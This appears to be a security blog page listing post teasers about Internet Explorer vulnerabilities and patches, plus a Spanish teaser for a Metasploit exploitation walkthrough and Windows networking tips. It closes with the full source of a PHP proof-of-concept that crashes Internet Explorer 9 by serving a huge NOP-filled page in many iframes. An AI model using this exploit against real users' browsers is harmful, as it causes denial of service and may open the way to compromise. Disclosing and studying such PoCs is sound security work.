Microsoft finally fixes critical Internet Explorer vulnerability

Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.

(Credit: Microsoft) 
 

In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.

READ MORE »

How to Speed Up Internet using Command Prompt

In today world most of people using internet. Some of them having high speed internet connection also some peoples don't have high speed internet connection. Speed internet connections also may go slow sometimes. Its just because that your computer settings may have to be changed for the speed connection. We can able to speed up the internet connection by simply with help of command prompt. 

READ MORE »

Over 20 security holes found in Windows, IE and other software. Patch now

Microsoft has released its regular “Patch Tuesday” bundle of security patches for Windows and its other software, protecting against a number of critical vulnerabilities.

Some of the security holes are classified as “critical”, meaning that malware or malicious hackers could exploit them to compromise a computer without any interaction by the user.

The most serious fix of the bunch is the MS13-059 cumulative patch for Internet Explorer.

READ MORE »

Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit

Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo que contengan estas versiones vulnerables. Recordar que en la actualidad existen muchos exploits remotos que pueden vulnerar este navegador, pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que hasta la actualidad se puede seguir explotando.  

El respectivo modulo que se integra en Metasploit se aprovecha de una vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor (mshtml). Este exploit utiliza una combinación de aspersión y el módulo de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y ASLR aprovechándose así para tomar el control total del sistema vulnerable.

A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.

READ MORE »

Kiểm tra các kết nối ẩn vào Internet trong Windows

Kết nối Internet của bạn chậm hơn bình thường? Phải chăng máy tính của bạn đã nhiễm malware, spyware hay adware, chúng đang chạy trong chế độ nền và tiêu tốn băng thông mà bạn không hề biết? Sau đây là vài thủ thuật giúp bạn kiểm tra được các kết nối từ máy tính của bạn vào Internet.

READ MORE »

Internet Explorer 9 Memory Corruption PoC Exploit

<?php

/**********************************************************
*   Internet Explorer 9 Memory Corruption PoC Exploit    *
**********************************************************
*                                                        *
* Successfully executed with IE9 version 9.0.8112.16421  *
*                                                        *
* Discovered by Jean Pascal Pereira <pereira@secbiz.de>  *
*                                                        *
**********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M');

if(!file_exists("junk.htm"))
{
  $string = "<span id='";
  
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
  
  file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
  print "<iframe style='display:none' src='junk.htm'>\n";
}

/* http://0xffe4.org */

?>